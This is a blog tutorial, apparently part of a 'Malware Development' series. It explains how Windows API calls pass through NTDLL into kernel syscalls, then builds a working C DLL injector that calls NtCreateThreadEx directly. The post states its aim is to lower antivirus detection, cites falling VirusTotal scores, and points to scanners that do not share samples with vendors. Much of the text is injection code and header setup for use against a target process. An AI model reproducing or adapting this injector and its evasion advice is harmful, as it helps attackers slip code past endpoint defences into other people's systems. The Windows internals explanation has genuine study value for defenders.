NTAPI Injection

June 23rd, 2023

Foreword

I've created a video to go along with this blog post. To watch the current installment of our "Malware Development" series, see the link below:

Overview

You may know by now that there exists the Win32 API and the native API (otherwise known as NTAPI). In this post, we're going to take a look at how the functions that you use from the standard Windows API get translated into the lower-level NTAPI/syscalls. After that, we'll program a super simple injector that will inject a DLL into our target process, except this time instead of using only Win32 API, we'll swap out one (1) function for its NTAPI counterpart. If you're looking for an example with all of the Win32 API swapped out for its NTAPI counterparts, check the article below:

You may be asking what the point of this is. Why are we even removing the high-level abstraction in the first place? Well, typically, the more wrappers we remove from our malware, the stealthier it becomes. Defensive solutions caught on to this over time, and it's still easy to detect the use of these native API calls. However, we can still see that it does make a difference. Take, for example, the DLL Injection example from the previous blog. If we submit this to VirusTotal, we can see that ten (10) vendors pick it up as malicious:

If I take the exact same program but replace some of the Win32 API with the lower-level NTAPI from NTDLL, we should see this number get lower.

We can see that our program does indeed get a lower score. Also remember that we're just including a DLL as our payload; if we were to use some signatured shellcode, like a reverse shell payload from msfvenom, our detection count would be much higher. Moreover, in that program, I've only swapped out two (2) of the Win32 API functions for their NTAPI counterparts, those being NtOpenProcess and NtCreateThreadEx. Don't worry if that looks alien to you; we'll go over that soon.

You should also be wary of uploading your malware to a site like VirusTotal (VT) if it's something you don't want to be shared with or examined by security vendors.

Some websites like VT will take your malware and share it with its partners for analysis and sample submission. Their partners are contractually obliged to use the sample you submit for internal security purposes only and for the purposes of bettering their antivirus engines, as well as detection. You can read more about this from the "Sharing & Disclosure" section of their "Privacy Policy" section:

If you'd like another site that you could use for testing that doesn't submit your sample upon submission, you could look at something like the following:

Even though the score difference doesn't seem that crazy, it's still knocking points off and making our malware more stealthy. And to reiterate, we only replaced two (2) functions. Let's move on now that we know why using something like NTAPI would be a better alternative than the standard Win32 API. Before we do that, we need to understand the difference between User-mode and Kernel-mode.

User and Kernel Mode

It's critical that we spend ample time and effort understanding these processor access modes (i.e., "user mode" and "kernel mode") because you'll be hearing these two terms all the time during your malware development journey. And it's not without reason. A lot of things like Anticheats, Antiviruses, EDRs, etc. run in kernel mode. They do this because running in kernel mode grants you access to all parts of the operating system, which if you're detecting and defending against malware, is a really important advantage to have.

"To protect user applications from accessing and/or modifying critical OS data, Windows uses two processor access modes (even if the processor on which Windows is running supports more than two): user mode and kernel mode. User application code runs in user mode, whereas OS code (such as system services and device drivers) runs in kernel mode. Kernel mode refers to a mode of execution in a processor that grants access to all system memory and all CPU instructions. Some processors differentiate between such modes by using the term code privilege level or ring level, while others use terms such as supervisor mode and application mode. Regardless of what it’s called, by providing the operating system kernel with a higher privilege level than user mode applications have, the processor provides a necessary foundation for OS designers to ensure that a misbehaving application can’t disrupt the stability of the system as a whole." - Windows Internals, Part I

x86 and x64 processors define four (4) privilege levels (or rings) to protect system code and data from being overwritten by accident or maliciously by code of lesser privilege. These rings help facilitate the "principle of least privilege" model.

If we take a look at the following diagram that shows the hierarchy of these privilege rings, we can see that the Kernel resides in the highest-privileged level (ring 0) and the applications we run, i.e., user-mode applications, reside on the lowest-privileged ring (ring 3):

If the kernel uses ring zero (0) and user applications use ring three (3), then what are rings one (1) and two (2) used for and why does Microsoft only use those aforementioned 0/3 rings?

RING0

The Kernel. Has the highest permissions, has access to everything; can communicate directly with the hardware. If something breaks here, it could crash the entire system.

RING1/2

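On paper, these intermediate rings were intended for "mostly" privileged code such as device drivers, offering more access than user-mode (ring 3) but less than the kernel. In practice, they aren't typically used on x86, and Windows doesn't use them at all: its kernel-mode drivers run in ring 0 alongside the kernel.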

RING3

If you start an application, this is where it'll be. Things like your web browser, text editor, games, whatever, run in user-mode. This has the lowest-level of permissions. It allows for things like your games, browsers, editors, etc., to crash and not bring the entire system crumbling down with it.
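To make the ring numbers a little less abstract, here's a minimal sketch of how a ring can be read out of a segment selector: on x86/x64, the low two bits of the selector loaded in CS give the current privilege level. The function name and the two example constants are my own for illustration; the selector values are ones commonly seen on x64 Windows, so treat them as an assumption and not something to hard-code.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed example values: code segment selectors commonly seen on x64 Windows. */
#define EXAMPLE_KERNEL_CS 0x10u /* kernel-mode code segment */
#define EXAMPLE_USER_CS   0x33u /* user-mode code segment   */

/* The low two bits of a segment selector hold the privilege level.
   For the selector loaded in CS, that is the ring the code runs in. */
unsigned ring_from_selector(uint16_t selector) {
    unsigned ring = selector & 0x3u;
    assert(ring <= 3u); /* only rings 0 through 3 exist */
    return ring;
}
```

Calling ring_from_selector(EXAMPLE_USER_CS) gives 3 and ring_from_selector(EXAMPLE_KERNEL_CS) gives 0, which lines up with the ring 0/ring 3 split described above.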

"The reason why Windows uses only two levels is that some hardware architectures, such as ARM today and MIPS/Alpha in the past, implemented only two privilege levels. Settling on the lowest minimum bar allowed for a more efficient and portable architecture, especially as the other x86/x64 ring levels do not provide the same guarantees as the ring 0/ring 3 divide." - Windows Internals, Part I

To get an idea of what happens when a function gets called, let's look at a typical function's flow path.

Function Flow

When we use a standard Win32 API function like WriteFile, the Kernel doesn't execute that function right away. Quite the opposite. The function goes on a Tolkien-esque adventure before it finally ends up in kernel mode.

We can see that the program (the User Application) starts by calling the WriteFile function, which is exported from the Kernel32.dll library. This module is also responsible for exporting most, if not all, of the Win32 API functions we've been using up to this point. We already know this from the DLL Injection blog post, specifically, the "Creating the Program" section:

After Kernel32.dll, the function goes into ntdll.dll. What exactly is that? NTDLL is the last big stop that your function makes before it crosses the threshold of kernel space via the syscall, sysenter, or int 2eh instructions. It exports the "Native API" (NTAPI) just like Kernel32 exposes the Win32 API. Let's examine a sample program like the one below:

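#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* atoi, EXIT_SUCCESS, EXIT_FAILURE */

int main(int argc, char* argv[]) {

    if (argc < 2) {
        puts("usage: handle.exe <PID>");
        return EXIT_FAILURE;
    }

    /* open a handle to the process whose PID was given on the command line */
    DWORD PID = (DWORD)atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (hProcess == NULL) {
        printf("failed to get a handle to the process. error: 0x%lx\n", GetLastError());
        return EXIT_FAILURE;
    }

    printf("got a handle to the process: 0x%p\n", hProcess);
    puts("press enter to exit");
    getchar();   /* keep the process alive so the API calls can be inspected */
    CloseHandle(hProcess);
    return EXIT_SUCCESS;

}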

At this point, you should know what this is doing. To resolve the API calls and see what functions our functions use, we can use an incredible tool called "API Monitor":

Start by opening the API Monitor program (it's architecture-sensitive, so make sure you open the version that corresponds with the architecture you built your program for). It's important that we specify the modules for which we'd like to monitor API calls. Because we've used Win32 API for this program, let's choose Kernel32.dll:

Once we've selected this, we can either go in and search for the specific functions (OpenProcess and CloseHandle), or we can just select a category of functions denoted by the folder names. OpenProcess belongs to the System Services > Processes and Threads section, and CloseHandle to the Windows System Information > Handles and Objects section. You can actually see this from the MSDN:

So, let's select the necessary ones.

We also want to do the same thing for the NTDLL module:

With those finally selected, we can move on to attaching our process to this program. To start our program and see what functions it calls, we can configure our startup options in File > Monitor New Process and press OK:

A new command prompt opens up and our program halts at the "press enter to exit" part. More importantly, we can see that our OpenProcess call gets captured, and even more importantly, we can see the NTAPI counterpart for it:

What an incredible program. We can see that our OpenProcess function gets translated into the lower-level NtOpenProcess NTAPI. Furthermore, this cool program shows us the parameters of this NtOpenProcess function as well.

"Hold on a minute. Crow, you said that NtOpenProcess was located in NTDLL.dll, but the program is showing the module of this function as KERNELBASE.dll. Have you just been lying to us?" Yes. Well, sort of. If we hover over the API call, we can 100% see that the function resides in NTDLL, or hell, even in the parameters section:

So this begs the question then, what the hell is that KERNELBASE.dll thing and where did it come from? KERNELBASE was made by Microsoft to act as a sort of "proxy" for your API calls. If we look at the documentation, we can see it being discussed here:

"As an example of functionality that we moved to low-level binaries, kernelbase.dll gets functionality from kernel32.dll and advapi32.dll. This means that the existing binary now forwards calls down to the new binary rather than handling them directly..." - MSDN

So far our function has taken this path:

OpenProcess (KERNEL32)
OpenProcess (KERNELBASE)
(Zw/Nt)OpenProcess (NTDLL)

There are many ways for us to see what the assembly stub of the KERNELBASE function looks like - and it's important for us to do this because it will also let us see how the function from KERNELBASE goes into NTDLL. I'll just use x64dbg, but you can very easily do this in IDA, WinDbg, etc. In the Symbols section, we can select the kernelbase.dll module, and search for the OpenProcess symbol:

Double-clicking that address and then viewing this function in the "Graph" mode of x64dbg, we can see the following:

From this, we can see the following instruction in the stub: call qword ptr ds:[<NtOpenProcess>]. This is the reference to the NTAPI inside of NTDLL. If we click on this function name, we can finally see how these functions fundamentally work and how NTAPI functions are called using their respective "System Service Numbers" (SSNs) or syscalls:

In this case, the syscall number of this function (26h) is moved into the eax register and then the syscall instruction (or int 2eh) is executed, after which the function runs in kernel mode. This is an incredibly high-level view, but we'll go into more depth about this when we get to the System Calls section. As we've seen so far, NTAPI functions are distinguished by names that begin with Nt or Zw. In user mode, they're exported from NTDLL, and in kernel mode, from the NTOSKRNL module. When these functions are executed, they will return an "NTSTATUS" value. There are a metric sh*t ton of these return values:
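You don't need to memorize the list, because the 32-bit value itself tells you a lot. Here's a small sketch of how an NTSTATUS breaks down into severity, facility, and code fields. The NTSTATUS typedef is a stand-in so this compiles without the Windows headers, and the helper names are made up for illustration; the three status values are real ones from Microsoft's published list.

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t NTSTATUS; /* stand-in for the Windows typedef (a signed 32-bit value) */

#define STATUS_SUCCESS         ((NTSTATUS)0x00000000)
#define STATUS_BUFFER_OVERFLOW ((NTSTATUS)0x80000005)
#define STATUS_ACCESS_DENIED   ((NTSTATUS)0xC0000022)

/* Bits 31-30: severity (0 = success, 1 = informational, 2 = warning, 3 = error). */
unsigned status_severity(NTSTATUS status) {
    unsigned severity = ((uint32_t)status >> 30) & 0x3u;
    assert(severity <= 3u);
    return severity;
}

/* Bits 27-16: facility, i.e. which component produced the status. */
unsigned status_facility(NTSTATUS status) {
    return ((uint32_t)status >> 16) & 0xFFFu;
}

/* Bits 15-0: the status code within that facility. */
unsigned status_code(NTSTATUS status) {
    return (uint32_t)status & 0xFFFFu;
}
```

With this, status_severity(STATUS_ACCESS_DENIED) comes back as 3 (error) and status_severity(STATUS_BUFFER_OVERFLOW) as 2 (warning), so a quick look at the top hex digit (0xC... versus 0x8... versus 0x0...) already tells you roughly what happened.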

Issues

The biggest thing you're going to realize when you start delving into the lower-level stuff is that most of it isn't documented and most of it is extremely unstable. The NTAPI from NTDLL isn't really documented; sure, the documentation does have some examples and certain references to the Native API and its functions. However, Microsoft has left it in the hands of our incredible reverse-engineering brothers and sisters to dump and figure out the inner workings of these things.

One of the more "practical" reasons why people don't just use the NTAPI is that, because it sits below the higher-level (and reliable/easy-to-use) API, it requires more fiddling to get it working right. The higher-level APIs provide a convenient and standardized interface to the underlying system. This makes it easier for developers to write software that works on multiple versions of Windows and reduces the likelihood of errors or compatibility issues. Microsoft definitely does take backward compatibility into consideration; however, things can and most likely will change from build version to build version, and almost definitely from OS version to OS version. From this site:

We can see the work that's gone into reconstructing these NTAPI functions and structures:

If you try to visit http://undocumented.ntinternals.net/, and you're not able to reach it or even if you're having issues with the link I've embedded above (i.e. if you get a "404: File not found." error), you can go on Internet Archive (wayback machine) and search for the link there and go to a snapshot to access it.

Also, please note that the site above isn't the only resource you can use for finding these functions. Actually, sometimes it could be quite problematic for some if they use this, especially if they only use this. The site is rather old so you should also be aware that some things could be wrong/inaccurate. Therefore, I've linked some alternatives that you could use to get function syntaxes and kernel structures down below.

There are probably a lot more that I'm missing, but with just these, and the previous sites mentioned so far, you should be set. Again, reach out and seek other resources, don't rely on a single resource for everything - that will only come back to bite you.

With the NTAPI covered and some of its potential issues acknowledged, let's begin the construction of our program.

Creating the Program

As we mentioned previously, we'll just replace one of the Win32 API functions within the old DLL injection program with its NTAPI counterpart. We can do it with all of the functions, definitely. However, this might get overwhelming, and we need to learn to walk before we can run. We'll just do one for now. If you want to see an example of all of the Win32 APIs replaced by their NTAPI counterparts, check the blog post below:

A lot of these NTAPI functions require setup in the form of declaring certain structures, making function prototypes, or initializing certain things. The blog post above covers the structure setup and everything but I'll also cover it here so don't worry; I got your back.

Here's a typical Win32 API DLL Injection program that you might find floating around the musty swamps that we call the internet:

dll_injection.c

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* atoi */

int main(int argc, char* argv[]) {

    if (argc < 2) {
        puts("usage: dll_injection.exe <PID>");
        return 1;
    }

    wchar_t     dllPath[MAX_PATH] = L"C:\\path\\to\\crow.dll";
    size_t      pathSize = sizeof(dllPath);

    DWORD PID = atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    HMODULE hKernel32 = GetModuleHandleW(L"kernel32");
    PTHREAD_START_ROUTINE kawLoadLibrary = (PTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
    LPVOID rBuffer = VirtualAllocEx(hProcess, NULL, pathSize, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    WriteProcessMemory(hProcess, rBuffer, dllPath, pathSize, NULL);
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, kawLoadLibrary, rBuffer, 0, 0);

    WaitForSingleObject(hThread, INFINITE);
    return 0;

}

By now, you should know the mechanisms behind this code like the back of your ankles. We can start now by swapping out one of the functions from here. I'm going to swap out CreateRemoteThread for NtCreateThreadEx. Let's look at the syntax for this. I'll be getting this information from a really good resource that we've included above, the PHNT files:

From the link above, we can see the following syntax we'll use to make a function prototype:

We could just plop this into our source code, but this requires more setup from us before we can start tinkering with it. The biggest thing that we need to sort out right away is the pair of POBJECT_ATTRIBUTES and PPS_ATTRIBUTE_LIST types present in the function. Those lines are referencing the _OBJECT_ATTRIBUTES and _PS_ATTRIBUTE_LIST structures. The "P" before them denotes that the parameter is a pointer to said structure.

So, because our function requires these structures, we have to include them in our project. You could include everything in one file, and that's what I used to do, but it would be cleaner for us to just make a header file to store all of this stuff so we can just work on our injection program without the extra bloat everywhere. So, in Visual Studio, let's create a new project and let's make a new header file and include the following for now:

glassBox.h

#pragma once
#pragma comment (lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*------[SETUP MACROS]------*/
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)

/*------[FUNCTION PROTOTYPE]------*/
typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
    _Out_    PHANDLE            ThreadHandle,
    _In_     ACCESS_MASK        DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_     HANDLE             ProcessHandle,
    _In_     PVOID              StartRoutine,
    _In_opt_ PVOID              Argument,
    _In_     ULONG              CreateFlags,
    _In_     SIZE_T             ZeroBits,
    _In_     SIZE_T             StackSize,
    _In_     SIZE_T             MaximumStackSize,
    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);

If you followed the last blog post with our simple DLL injection, these macros shouldn't be alien to you. Now, you'll notice the issue of the structures I was talking about when you just put this code above into a header file:

So, where can we find these structures? How do we know what members we need to include in our definitions? Well, we have two options here. Either we manually dump them ourselves, or, the more "sane" (but less fun) approach is to get them from sites like Vergilius, ReactOS, etc. I'll be using Vergilius for the _OBJECT_ATTRIBUTES structure. If we head to the site, and find the way to our current build of Windows, which you can get by issuing the winver command in a shell:

From there, we can start searching for structures. We'll query the _OBJECT_ATTRIBUTES structure, as shown here:

We can then click on this, and see what the structure looks like.

You can find this yourself in the link embedded below:

Make sure to put the typedef keyword before "struct" so that we can give the structure the type names our function prototype expects. Vergilius only gives us the members and the tag at the top of the definition (_OBJECT_ATTRIBUTES), so we have to manually add the structure name and the pointer name after the closing brace: OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES. Now, we've gotten rid of one red line of misery, all that's left is to abolish the other one.
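For reference, the finished definition should end up looking roughly like the sketch below. The members follow the publicly documented layout of this structure, but double check them against the source you pulled yours from. The three typedefs at the top are stand-ins I've added so the snippet compiles on its own; in the real header you'd drop them, since Windows.h already provides ULONG, HANDLE, and PVOID. The make_empty_attributes helper is hypothetical and only there to show the initializer we'll use later in the post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in types so the sketch compiles without <Windows.h>. */
typedef uint32_t ULONG;
typedef void    *HANDLE;
typedef void    *PVOID;
typedef struct _UNICODE_STRING UNICODE_STRING, *PUNICODE_STRING; /* left opaque here */

/* typedef + tag + the two names we need: the structure and a pointer to it. */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;                   /* size of this structure in bytes */
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Hypothetical helper: Length is set explicitly, every other member is zeroed. */
OBJECT_ATTRIBUTES make_empty_attributes(void) {
    OBJECT_ATTRIBUTES oa = { sizeof(oa), NULL };
    assert(oa.Length == sizeof(OBJECT_ATTRIBUTES));
    return oa;
}
```

Because C zero-initializes any members left out of a brace initializer, { sizeof(oa), NULL } is enough to get a structure with a valid Length and everything else empty.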

You may realize that my version of Windows shown, doesn't directly match with the version of Windows I yoinked this structure definition from in Vergilius. It may be the case that that'll happen to you as well. Again, use more than one resource. For us here, it doesn't matter too much. The structure's good even for my build but as we're approaching lower and lower levels, we need to be mindful of these things because if we have even one version mismatch, things might not work. Especially in the case of structures and system calls.

With this next structure, _PS_ATTRIBUTE_LIST, it, unfortunately, won't be as easy as searching it on Vergilius and copy-pasting it in. If we look for this structure on Vergilius, we'll see that it's not actually there - which means we'll have to use something else. I found the following resource for this structure:

From the repository above, we can see that the _PS_ATTRIBUTE_LIST structure is as follows:

typedef struct _PS_ATTRIBUTE_LIST {
	SIZE_T TotalLength;					/// sizeof(PS_ATTRIBUTE_LIST)
	PS_ATTRIBUTE Attributes[2];			/// Depends on how many attribute entries should be supplied to NtCreateUserProcess
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

But, we can't use this just yet. This structure references another structure on the line: PS_ATTRIBUTE Attributes[2];. Because of this, we also need to grab the _PS_ATTRIBUTE structure, which we can find directly above the _PS_ATTRIBUTE_LIST structure from the resource below:

typedef struct _PS_ATTRIBUTE {
	ULONGLONG Attribute;				/// PROC_THREAD_ATTRIBUTE_XXX | PROC_THREAD_ATTRIBUTE_XXX modifiers, see ProcThreadAttributeValue macro and Windows Internals 6 (372)
	SIZE_T Size;						/// Size of Value or *ValuePtr
	union {
		ULONG_PTR Value;				/// Reserve 8 bytes for data (such as a Handle or a data pointer)
		PVOID ValuePtr;					/// data pointer
	};
	PSIZE_T ReturnLength;				/// Either 0 or specifies size of data returned to caller via "ValuePtr"
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;

Now, after including these two structures in our header file, we're all set to begin programming and we don't see any annoying red lines.

Perfect. Let's start with our actual injection program now. The one thing that I added for QoL is a function that will attempt to get a handle on the module we specify and automatically perform some "error" handling so that we don't need to spam our program with a bunch of if-else statements.

HMODULE getMod(LPCWSTR modName) {
    
    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);
    
    if (hModule == NULL) {
        warn("failed to get a handle to the module. error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }
    
}

This function takes the name of the module you wish to get a handle on, and tries to get a handle on it - if it can't get a handle, i.e., if GetModuleHandleW returns NULL, it'll just return NULL. Anyways, let's continue. On to the main function:

(snip ...)

int main(int argc, char* argv[]) {

    DWORD             PID               = 0;
    HANDLE            hProcess          = NULL;
    HANDLE            hThread           = NULL;
    HMODULE           hKernel32         = NULL;
    HMODULE           hNTDLL            = NULL;
    PVOID             rBuffer           = NULL;

    wchar_t           dllPath[MAX_PATH] = L"C:\\path\\to\\crow.dll";
    size_t            pathSize          = sizeof(dllPath);
    size_t            bytesWritten      = 0;

    OBJECT_ATTRIBUTES OA                = { sizeof(OA), NULL };

(snip ...)

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }
    
    okay("finished with the cleanup, exiting now.");
    return EXIT_SUCCESS;

}

All of this looks standard compared to what we've been doing so far, except for the hNTDLL variable, which is where we'll store the base address of the NTDLL module once we get a handle on it via our getMod function. The only other difference is the inclusion of OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };, which sets the Length member to the size of the structure and zero-initializes the remaining members.

This is here because NtCreateThreadEx needs a pointer to this structure for one of its arguments, but we'll get there when we get there. Another thing you'll note is the CLEANUP label that we'll use for house cleaning. This provides a very nice and efficient way to close all our handles and clean up the program upon exiting and upon errors.

There's a bit of a debate about using goto in your program - the main gripe has to do with readability, but for simple house cleaning like closing handles, I think it's actually pretty OP. Anywho, let's continue.
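If you haven't seen the pattern before, here's a stripped-down sketch of it outside of the injector. Everything in it is hypothetical: the two malloc'd buffers stand in for our handles, release stands in for CloseHandle, and fail_at only exists so you can force a failure at a given step. One thing this sketch does differently from the program in this post is carry a return code through the label, so a failure path doesn't report success.

```c
#include <assert.h>
#include <stdlib.h>

int g_released = 0; /* counts releases so the cleanup can be observed */

/* Stand-in for CloseHandle: frees the resource and records that it did. */
void release(void *resource) {
    free(resource);
    g_released++;
}

/* fail_at: 0 = no failure, 1 = fail after the first acquisition,
            2 = fail after the second acquisition.                 */
int run_with_cleanup(int fail_at) {
    int   rc     = EXIT_FAILURE;
    void *first  = NULL;
    void *second = NULL;

    assert(fail_at >= 0 && fail_at <= 2);

    first = malloc(16);
    if (first == NULL || fail_at == 1) goto CLEANUP;

    second = malloc(16);
    if (second == NULL || fail_at == 2) goto CLEANUP;

    rc = EXIT_SUCCESS; /* only reached when every step worked */

CLEANUP:
    /* Release in reverse order, and only what was actually acquired. */
    if (second) release(second);
    if (first)  release(first);
    return rc;
}
```

Every exit goes through the same label, so no matter where things go wrong, whatever was acquired up to that point gets released exactly once.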

(snip ...)

    if (argc < 2) {
        warn("usage: %s <PID>", argv[0]);
        return EXIT_FAILURE;
    }

    PID = atoi(argv[1]);
    info("trying to get a handle to the process (%ld)", PID);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

    if (hProcess == NULL) {
        warn("failed to get a handle to the process. error: 0x%lx", GetLastError());
        return EXIT_FAILURE;
    }

    okay("got a handle to the process!");
    info("\\___[ hProcess\n\t\\_0x%p]\n", hProcess);
    info("getting handle to Kernel32 and NTDLL");

    hNTDLL = getMod(L"ntdll.dll");
    hKernel32 = getMod(L"kernel32.dll");

    if (hNTDLL == NULL || hKernel32 == NULL) {
        warn("module(s) == NULL. error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    pNtCreateThreadEx kawCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
    okay("got the address of NtCreateThreadEx from NTDLL");
    info("\\___[ kawCreateThread\n\t\\_0x%p]\n", kawCreateThreadEx);
    PTHREAD_START_ROUTINE kawLoadLibrary = (PTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
    okay("got the address of LoadLibrary from KERNEL32");
    info("\\___[ LoadLibraryW\n\t\\_0x%p]\n", kawLoadLibrary);
    
    rBuffer = VirtualAllocEx(hProcess, rBuffer, pathSize, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    if (rBuffer == NULL) {
        warn("failed to allocate memory in the target process. error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    okay("allocated memory in target process");

    WriteProcessMemory(hProcess, rBuffer, dllPath, pathSize, &bytesWritten);
    okay("wrote %zu-bytes to the allocated buffer", bytesWritten);

(snip ...)

We get a handle on the process identified by the PID we supply. After that, we use our getMod function to get a handle to NTDLL and Kernel32. Why these two modules, specifically?

Kernel32 -> We need this for the LoadLibraryW function so that we can load our module into the target process's memory and have the entry point of our DLL (DllMain) run.
NTDLL -> We need a handle on NTDLL because NtCreateThreadEx resides there. Our glassBox.h header only defines a function pointer type (pNtCreateThreadEx); it doesn't give us the function itself. So, we look the function up in NTDLL and, once found, assign its address to a variable of that pointer type.

After that, we populate our NtCreateThreadEx function pointer. Furthermore, we do what we've done previously and reach into Kernel32 to look for LoadLibraryW. We typecast that to PTHREAD_START_ROUTINE so that it has the type of a thread start routine, since this is where we want the newly created thread to begin executing.
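If the "typedef a pointer type, then fill it in at runtime" idea feels fuzzy, here's a toy model of it with no Windows involved. Nothing here is a real API: toy_get_proc is a made-up stand-in for a lookup-by-name function, and the little export table is a hypothetical module with two functions. The point is just the shape: look a name up, get a generic address back, check it for NULL, and only then cast it to the typed pointer you actually want to call.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef void (*ToyProc)(void);      /* generic function pointer returned by the lookup */
typedef int  (*pToyAdd)(int, int);  /* typed pointer, analogous to pNtCreateThreadEx   */

/* Hypothetical "exports" of a toy module. */
int toy_add(int a, int b) { return a + b; }
int toy_sub(int a, int b) { return a - b; }

typedef struct {
    const char *name;
    ToyProc     address;
} ToyExport;

static const ToyExport toy_exports[] = {
    { "ToyAdd", (ToyProc)toy_add },
    { "ToySub", (ToyProc)toy_sub },
};

/* Toy lookup: name in, generic address out, NULL when the name isn't exported. */
ToyProc toy_get_proc(const char *name) {
    assert(name != NULL);
    for (size_t i = 0; i < sizeof(toy_exports) / sizeof(toy_exports[0]); i++) {
        if (strcmp(toy_exports[i].name, name) == 0) {
            return toy_exports[i].address;
        }
    }
    return NULL;
}
```

Usage looks like pToyAdd add = (pToyAdd)toy_get_proc("ToyAdd); followed by a NULL check before calling add(2, 3). The same habit is worth carrying over to real lookups: a misspelled name gives you NULL, and calling through NULL is a crash.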

We allocate a buffer in the target process's memory with PAGE_READWRITE permissions and write the DLL path to that allocated buffer. Now, all that's left is to use our NTAPI NtCreateThreadEx function, which we've called kawCreateThreadEx and which, at this point, is primed and ready.
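One detail worth noticing: pathSize is sizeof(dllPath), which is the size of the whole MAX_PATH-sized array and not just the string inside it. Both work, since the rest of the array is zeroed, but the sketch below shows the difference. The names are my own, and EXAMPLE_MAX_PATH is a stand-in for MAX_PATH so that this compiles without the Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

#define EXAMPLE_MAX_PATH 260 /* same value as MAX_PATH on Windows */

/* Same declaration shape as dllPath in the program. */
const wchar_t example_path[EXAMPLE_MAX_PATH] = L"C:\\path\\to\\crow.dll";

/* Bytes needed to store a wide string, including its terminating L'\0'. */
size_t wide_string_bytes(const wchar_t *s) {
    assert(s != NULL);
    return (wcslen(s) + 1) * sizeof(wchar_t);
}
```

On Windows, where wchar_t is two bytes, sizeof(example_path) is 520 bytes while wide_string_bytes(example_path) is 40 bytes (19 characters plus the terminator). Writing the full array is harmless here; it just means the allocation and the write are larger than the string strictly needs.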

The NTAPI functions return an NTSTATUS, not a handle. So, we can't capture the return value in a HANDLE as we did in our previous examples:

HANDLE hThread = CreateRemoteThread(...);

For this, we'll have to hold the return value of our kawCreateThreadEx function with a variable like:

NTSTATUS status = kawCreateThreadEx(...);

Because this function will return an NTSTATUS, we want to see if it returns one of the values seen here:

More specifically, we want to see if the STATUS_SUCCESS NTSTATUS value gets returned, which we can see is the following value:

From the same page, we can see what this value/code actually means:

We can define this value in our header file so that we can do some error handling for our kawCreateThreadEx function. So, let's set the following line:

#pragma once
#pragma comment (lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*------[SETUP MACROS]------*/
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)

(snip ...)

With that done, we can finally start filling out the arguments to our kawCreateThreadEx function.

NTSTATUS status = kawCreateThreadEx(&hThread, ...);

The first argument (ThreadHandle) is a pointer to the hThread variable, which will receive the handle to the new thread once it gets created. The second parameter (DesiredAccess) is the access we'd like for the newly created thread. We could just specify THREAD_ALL_ACCESS as our argument.

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, ...);

The next argument (ObjectAttributes) we supply is a pointer to the OBJECT_ATTRIBUTES structure we created. We assigned that structure to our OA variable so let's supply that for this argument:

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, ...);

Next, we supply our process handle for the ProcessHandle parameter:

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, ...);

StartRoutine is the next parameter, and we can supply our PTHREAD_START_ROUTINE-casted LoadLibraryW function (kawLoadLibrary):

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, ...);

We're almost done. Argument is the next parameter, and though it's named differently, it's just going to be the rBuffer that we've created since that will be holding the dllPath in it at this point.

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, rBuffer, ...);

The remaining parameters are all going to be 0 or NULL. The flag and size parameters are integer types, so we pass 0 for those and keep NULL for the one pointer:

CreateFlags -> 0
ZeroBits -> 0
StackSize -> 0
MaximumStackSize -> 0
AttributeList -> NULL

  NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, rBuffer, 0, 0, 0, 0, NULL);

